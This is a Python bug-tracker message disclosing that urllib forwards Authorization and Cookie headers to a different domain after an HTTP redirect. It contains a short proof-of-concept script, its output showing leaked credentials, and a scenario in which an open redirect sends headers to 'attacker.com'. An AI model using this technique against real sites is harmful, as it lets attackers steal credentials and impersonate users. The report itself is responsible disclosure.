This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author artem.smotrakov
Recipients alex, artem.smotrakov
Date 2018-05-27.14:20:06
SpamBayes Score -1.0
Marked as misclassified Yes
Message-id <[email protected]>
In-reply-to
Content
After discussing it on [email protected], it was decided to disclose it. Here is the original report:




Hello Python Security Team,

Looks like urllib may leak sensitive HTTP headers to third parties when handling redirects.

Let's consider the following environment:
- http://httpleak.gypsyengineer.com/index.php asks a user to authenticate via basic HTTP authentication scheme
- http://httpleak.gypsyengineer.com/redirect.php?url=<url> is an open redirect which returns 301 code, and redirects a client to the specified URL
- http://headers.gypsyengineer.com just prints out all HTTP headers which a web browser sent

Let's then consider the following scenario:
- create an instance of urllib.request.Request to open 'http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com'
- call urllib.request.Request.add_header() method to set Authorization and Cookie headers
- call urllib.request.urlopen() method to open a connection

Here is what happens next:
- urllib sends the HTTP authentication header to httpleak.gypsyengineer.com as expected
- redirect.php returns 301 code which redirects to headers.gypsyengineer.com (note that httpleak.gypsyengineer.com and headers.gypsyengineer.com are different domains)
- urllib processes 301 code and makes a request to http://headers.gypsyengineer.com

The problem is that urllib sends the Authorization and Cookie headers headers to http://headers.gypsyengineer.com as well.

Let's imagine that a user is authenticated on a web site via one of HTTP authentication schemes (basic, digest, NTLM, SPNEGO/Kerberos), 
and the web site has an open redirect like http://httpleak.gypsyengineer.com/redirect.php
If an attacker can trick the user to open http://httpleak.gypsyengineer.com/redirect.php?url=http://attacker.com, 
then urllib is going to send sensitive headers to http://attacker.com where the attacker can gather them. 
As a result, the attacker can imporsonate the user on the original web site.

Here is a simple POC which shows the problem:

import urllib.request
req = urllib.request.Request('http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com')
req.add_header('Authorization', 'Basic YWRtaW46dGVzdA==')
req.add_header('Cookie', 'This is only for httpleak.gypsyengineer.com');
with urllib.request.urlopen(req) as f:
  print(f.read(2048).decode("utf-8"))


Running this code results to loading http://headers.gypsyengineer.com which prints out Authorization and Cookie headers 
which are supposed to be sent only to httpleak.gypsyengineer.com:

Hello, I am <b>headers.gypsyengineer.com</b></br></br>
Here are HTTP headers you just sent me:</br></br>
Accept-Encoding: identity</br>
User-Agent: Python-urllib/3.8</br>
<b>Authorization: Basic YWRtaW46dGVzdA==</br></b>
<b>Cookie: This is only for httpleak.gypsyengineer.com</br></b>
Host: headers.gypsyengineer.com</br>
Cache-Control: max-age=259200</br>
Connection: keep-alive</br>


I could reproduce it with 3.5.2, and latest build of https://github.com/python/cpython

If I am not missing something, it would be better if urllib filtered out sensitive HTTP headers while handling redirects.

Please let me know if I wrote anything dumb and stupid, or if you have any questions :) Thanks!

Artem
History
Date User Action Args
2018-05-27 14:20:06artem.smotrakovsetrecipients: + artem.smotrakov, alex
2018-05-27 14:20:06artem.smotrakovsetmessageid: <[email protected]>
2018-05-27 14:20:06artem.smotrakovlinkissue33661 messages
2018-05-27 14:20:06artem.smotrakovcreate